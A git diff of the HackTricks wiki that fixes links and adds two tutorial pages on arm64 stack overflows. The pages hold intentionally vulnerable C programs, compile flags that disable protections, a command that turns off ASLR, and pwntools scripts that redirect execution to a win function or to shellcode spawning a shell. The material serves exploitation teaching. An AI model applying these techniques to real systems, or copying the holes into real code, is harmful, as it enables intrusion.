* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -28,8 +28,8 @@ Calling the syscall **`sigreturn`** from a ROP chain and **adding the registry v
|
||||||
|
|
||||||
Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
|
Note how this would be a **type of Ret2syscall** that makes much easier to control params to call other Ret2syscalls:
|
||||||
|
|
||||||
{% content-ref url="rop-syscall-execv.md" %}
|
{% content-ref url="rop-syscall-execv/" %}
|
||||||
[rop-syscall-execv.md](rop-syscall-execv.md)
|
[rop-syscall-execv](rop-syscall-execv/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
If you are curious this is the **sigcontext structure** stored in the stack to later recover the values (diagram from [**here**](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)):
|
If you are curious this is the **sigcontext structure** stored in the stack to later recover the values (diagram from [**here**](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)):
|
||||||
|
@ -145,11 +145,11 @@ target.interactive()
|
||||||
* [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
|
* [https://youtu.be/ADULSwnQs-s?feature=shared](https://youtu.be/ADULSwnQs-s?feature=shared)
|
||||||
* [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
|
* [https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop](https://ir0nstone.gitbook.io/notes/types/stack/syscalls/sigreturn-oriented-programming-srop)
|
||||||
* [https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html](https://guyinatuxedo.github.io/16-srop/backdoor\_funsignals/index.html)
|
||||||
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv.md) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
|
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv/) via a **sigreturn** structure and read the flag which is inside the memory of the binary.
|
||||||
* [https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html](https://guyinatuxedo.github.io/16-srop/csaw19\_smallboi/index.html)
|
||||||
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv.md) via a **sigreturn** structure (the binary has the string `/bin/sh`).
|
* Assembly binary that allows to **write to the stack** and then calls the **`sigreturn`** syscall. It's possible to write on the stack a [**ret2syscall**](rop-syscall-execv/) via a **sigreturn** structure (the binary has the string `/bin/sh`).
|
||||||
* [https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html](https://guyinatuxedo.github.io/16-srop/inctf17\_stupidrop/index.html)
|
||||||
* 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](rop-syscall-execv.md). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
|
* 64 bits, no relro, no canary, nx, no pie. Simple buffer overflow abusing `gets` function with lack of gadgets that performs a [**ret2syscall**](rop-syscall-execv/). The ROP chain writes `/bin/sh` in the `.bss` by calling gets again, it abuses the **`alarm`** function to set eax to `0xf` to call a **SROP** and execute a shell.
|
||||||
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
|
* [https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html](https://guyinatuxedo.github.io/16-srop/swamp19\_syscaller/index.html)
|
||||||
* 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.
|
* 64 bits assembly program, no relro, no canary, nx, no pie. The flow allows to write in the stack, control several registers, and call a syscall and then it calls `exit`. The selected syscall is a `sigreturn` that will set registries and move `eip` to call a previous syscall instruction and run `memprotect` to set the binary space to `rwx` and set the ESP in the binary space. Following the flow, the program will call read intro ESP again, but in this case ESP will be pointing to the next intruction so passing a shellcode will write it as the next instruction and execute it.
|
||||||
|
|
||||||
|
|
|
@ -77,16 +77,16 @@ However, in other scenarios maybe just **overwriting some variables values in th
|
||||||
|
|
||||||
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
In this type of CTF challenges, there is a **function** **inside** the binary that is **never called** and that **you need to call in order to win**. For these challenges you just need to find the **offset to overwrite the return address** and **find the address of the function** to call (usually [**ASLR**](../common-binary-protections-and-bypasses/aslr/) would be disabled) so when the vulnerable function returns, the hidden function will be called:
|
||||||
|
|
||||||
{% content-ref url="ret2win.md" %}
|
{% content-ref url="ret2win/" %}
|
||||||
[ret2win.md](ret2win.md)
|
[ret2win](ret2win/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### Stack Shellcode
|
### Stack Shellcode
|
||||||
|
|
||||||
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
In this scenario the attacker could place a shellcode in the stack and abuse the controlled EIP/RIP to jump to the shellcode and execute arbitrary code:
|
||||||
|
|
||||||
{% content-ref url="stack-shellcode.md" %}
|
{% content-ref url="stack-shellcode/" %}
|
||||||
[stack-shellcode.md](stack-shellcode.md)
|
[stack-shellcode](stack-shellcode/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
### ROP & Ret2... techniques
|
### ROP & Ret2... techniques
|
||||||
|
@ -97,6 +97,14 @@ This technique is the fundamental framework to bypass the main protection to the
|
||||||
[rop-return-oriented-programing](../rop-return-oriented-programing/)
|
[rop-return-oriented-programing](../rop-return-oriented-programing/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Heap Overflows
|
||||||
|
|
||||||
|
An overflow is not always going to be in the stack, it could also be in the **heap** for example:
|
||||||
|
|
||||||
|
{% content-ref url="../heap/heap-overflow.md" %}
|
||||||
|
[heap-overflow.md](../heap/heap-overflow.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
## Types of protections
|
## Types of protections
|
||||||
|
|
||||||
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
|
There are several protections trying to prevent the exploitation of vulnerabilities, check them in:
|
||||||
|
@ -105,8 +113,6 @@ There are several protections trying to prevent the exploitation of vulnerabilit
|
||||||
[common-binary-protections-and-bypasses](../common-binary-protections-and-bypasses/)
|
[common-binary-protections-and-bypasses](../common-binary-protections-and-bypasses/)
|
||||||
{% endcontent-ref %}
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -89,8 +89,8 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**PIE**](../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
* [**PIE**](../../common-binary-protections-and-bypasses/pie/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded. In some cases, when the function that causes the overflow is `read` or similar, you can do a **Partial Overwrite** of 1 or 2 bytes to change the return address to be the win function. Because of how ASLR works, the last three hex nibbles are not randomized, so there is a **1/16 chance** (1 nibble) to get the correct return address.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
|
|
||||||
## Other examples & References
|
## Other examples & References
|
||||||
|
|
||||||
|
@ -113,6 +113,16 @@ The Python script sends a carefully crafted message that, when processed by the
|
||||||
* The program is only validating the last byte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win.
|
* The program is only validating the last byte of a number to check for the size of the input, therefore it's possible to add any zie as long as the last byte is inside the allowed range. Then, the input creates a buffer overflow exploited with a ret2win.
|
||||||
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
* [https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/](https://7rocky.github.io/en/ctf/other/blackhat-ctf/fno-stack-protector/)
|
||||||
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
* 64 bit, relro, no canary, nx, pie. Partial overwrite to call the win function (ret2win)
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/](https://8ksec.io/arm64-reversing-and-exploitation-part-3-a-simple-rop-chain/)
|
||||||
|
* arm64, PIE, it gives a PIE leak the win function is actually 2 functions so ROP gadget that calls 2 functions
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/)
|
||||||
|
* ARM64, off-by-one to call a win function
|
||||||
|
|
||||||
|
## ARM64 Example
|
||||||
|
|
||||||
|
{% content-ref url="ret2win-arm64.md" %}
|
||||||
|
[ret2win-arm64.md](ret2win-arm64.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
214
binary-exploitation/stack-overflow/ret2win/ret2win-arm64.md
Normal file
|
@ -0,0 +1,214 @@
|
||||||
|
# Ret2win - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void win() {
|
||||||
|
printf("Congratulations!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie and canary:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie
|
||||||
|
```
|
||||||
|
|
||||||
|
## Finding the offset
|
||||||
|
|
||||||
|
### Pattern option
|
||||||
|
|
||||||
|
This example was created using [**GEF**](https://github.com/bata24/gef):
|
||||||
|
|
||||||
|
Stat gdb with gef, create pattern and use it:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
pattern create 200
|
||||||
|
run
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1202).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
arm64 will try to return to the address in the register x30 (which was compromised), we can use that to find the pattern offset:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
pattern search $x30
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1203).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
**The offset is 72 (9x48).**
|
||||||
|
|
||||||
|
### Stack offset option
|
||||||
|
|
||||||
|
Start by getting the stack address where the pc register is stored:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
gdb -q ./ret2win
|
||||||
|
b *vulnerable_function + 0xc
|
||||||
|
run
|
||||||
|
info frame
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1204).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Now set a breakpoint after the `read()` and continue until the `read()` is executed and set a pattern such as 13371337:
|
||||||
|
|
||||||
|
```
|
||||||
|
b *vulnerable_function+28
|
||||||
|
c
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1205).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Find where this pattern is stored in memory:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1206).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Then: **`0xfffffffff148 - 0xfffffffff100 = 0x48 = 72`**
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1207).png" alt="" width="339"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
## No PIE
|
||||||
|
|
||||||
|
### Regular
|
||||||
|
|
||||||
|
Get the address of the **`win`** function:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
objdump -d ret2win | grep win
|
||||||
|
ret2win: file format elf64-littleaarch64
|
||||||
|
00000000004006c4 <win>:
|
||||||
|
```
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p64(0x00000000004006c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1208).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Off-by-1
|
||||||
|
|
||||||
|
Actually this is going to by more like a off-by-2 in the stored PC in the stack. Instead of overwriting all the return address we are going to overwrite **only the last 2 bytes** with `0x06c4`.
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x06c4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1209).png" alt="" width="375"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
You can find another off-by-one example in ARM64 in [https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/](https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/), which is a real off-by-**one** in a fictitious vulnerability.
|
||||||
|
|
||||||
|
## With PIE
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
Compile the binary **without the `-no-pie` argument**
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### Off-by-2
|
||||||
|
|
||||||
|
Without a leak we don't know the exact address of the winning function but we can know the offset of the function from the binary and knowing that the return address we are overwriting is already pointing to a close address, it's possible to leak the offset to the win function (**0x7d4**) in this case and just use that offset:
|
||||||
|
|
||||||
|
<figure><img src="../../../.gitbook/assets/image (1210).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Configuration
|
||||||
|
binary_name = './ret2win'
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Prepare the payload
|
||||||
|
offset = 72
|
||||||
|
ret2win_addr = p16(0x07d4)
|
||||||
|
payload = b'A' * offset + ret2win_addr
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Check response
|
||||||
|
print(p.recvline())
|
||||||
|
p.close()
|
||||||
|
```
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
@ -214,6 +214,12 @@ Check the ret2esp technique here:
|
||||||
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
* [https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html](https://guyinatuxedo.github.io/17-stack\_pivot/insomnihack18\_onewrite/index.html)
|
||||||
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
* 64 bit, no relro, canary, nx and pie. The program grants a leak for stack or pie and a WWW of a qword. First get the stack leak and use the WWW to go back and get the pie leak. Then use the WWW to create an eternal loop abusing `.fini_array` entries + calling `__libc_csu_fini` ([more info here](../arbitrary-write-2-exec/www2exec-.dtors-and-.fini\_array.md)). Abusing this "eternal" write, it's written a ROP chain in the .bss and end up calling it pivoting with RBP.
|
||||||
|
|
||||||
|
## ARM64
|
||||||
|
|
||||||
|
In ARM64, the **prologue and epilogues** of the functions **don't store and retrieve the SP registry** in the stack. Therefore, by default, you **won't be able to control the SP registry** by overwriting some data inside the stack.
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -90,9 +90,9 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
|
||||||
|
|
||||||
## Protections
|
## Protections
|
||||||
|
|
||||||
* [**ASLR**](../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
* [**ASLR**](../../common-binary-protections-and-bypasses/aslr/) **should be disabled** for the address to be reliable across executions or the address where the function will be stored won't be always the same and you would need some leak in order to figure out where is the win function loaded.
|
||||||
* [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
* [**Stack Canaries**](../../common-binary-protections-and-bypasses/stack-canaries/) should be also disabled or the compromised EIP return address won't never be followed.
|
||||||
* [**NX**](../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
* [**NX**](../../common-binary-protections-and-bypasses/no-exec-nx.md) **stack** protection would prevent the execution of the shellcode inside the stack because that region won't be executable.
|
||||||
|
|
||||||
## Other Examples & References
|
## Other Examples & References
|
||||||
|
|
||||||
|
@ -103,6 +103,8 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
|
||||||
* 32 bit, ASLR with stack leak, write shellcode and jump to it
|
* 32 bit, ASLR with stack leak, write shellcode and jump to it
|
||||||
* [https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html)
|
* [https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html](https://guyinatuxedo.github.io/06-bof\_shellcode/tu18\_shellaeasy/index.html)
|
||||||
* 32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it
|
* 32 bit, ASLR with stack leak, comparison to prevent call to exit(), overwrite variable with a value and write shellcode and jump to it
|
||||||
|
* [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
|
||||||
|
* arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
|
@ -0,0 +1,107 @@
|
||||||
|
# Stack Shellcode - arm64
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie, canary and nx:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
## No ASLR & No canary - Stack Overflow 
|
||||||
|
|
||||||
|
To stop ASLR execute:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||||
|
```
|
||||||
|
|
||||||
|
To get the [**offset of the bof check this link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Load the binary
|
||||||
|
binary_name = './bof'
|
||||||
|
elf = context.binary = ELF(binary_name)
|
||||||
|
|
||||||
|
# Generate shellcode
|
||||||
|
shellcode = asm(shellcraft.sh())
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Offset to return address
|
||||||
|
offset = 72
|
||||||
|
|
||||||
|
# Address in the stack after the return address
|
||||||
|
ret_address = p64(0xfffffffff1a0)
|
||||||
|
|
||||||
|
# Craft the payload
|
||||||
|
payload = b'A' * offset + ret_address + shellcode
|
||||||
|
|
||||||
|
print("Payload length: "+ str(len(payload)))
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Drop to an interactive session
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
|
||||||
|
|
||||||
|
I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
